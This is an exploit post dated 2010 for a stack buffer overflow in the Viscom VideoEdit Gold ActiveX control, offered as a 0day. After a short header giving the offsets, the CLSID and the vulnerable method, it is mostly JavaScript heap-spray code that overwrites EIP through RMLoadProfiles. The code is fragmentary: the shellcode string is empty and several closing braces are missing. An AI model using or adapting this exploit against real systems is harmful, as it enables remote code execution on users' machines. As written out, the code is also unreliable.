Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
Date: Dec 5, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://www.viscomsoft.com/products/videoeditgold/index.html
Tested on: WinXP - IE 6
CVE: NA (0day)
Impact is relatively low due to object not marked safe for scripting.You'll
need to change the default IE settings to let it run.
This is a plain vanilla stack overflow.The file is...
"%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx"
I'm not using the SEH but here's the offsets just for kicks if you're interested.
[2311 junk] [ebp] [eip] [284 junk] [nseh] [seh]
<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object>
// Ctrl+C Ctrl+V, herpderp
// calc.exe
var shellcode = unescape(
var nops = unescape('%u9090%u9090');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while(nops.length < slackspace) {
nops += nops;
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
while((block.length + slackspace) < 0x50000) {
block = block + block + fillblock;
memory=new Array();
for(counter=0; counter<200; counter++){
memory[counter] = block + shellcode;
var bof = '';
while(bof.length < 2312){
bof += 'A';
bof += 'BBBB'; // EBP
bof += "\x0c\x0c\x0c\x0c"; // EIP
document.getElementById('target').RMLoadProfiles( bof );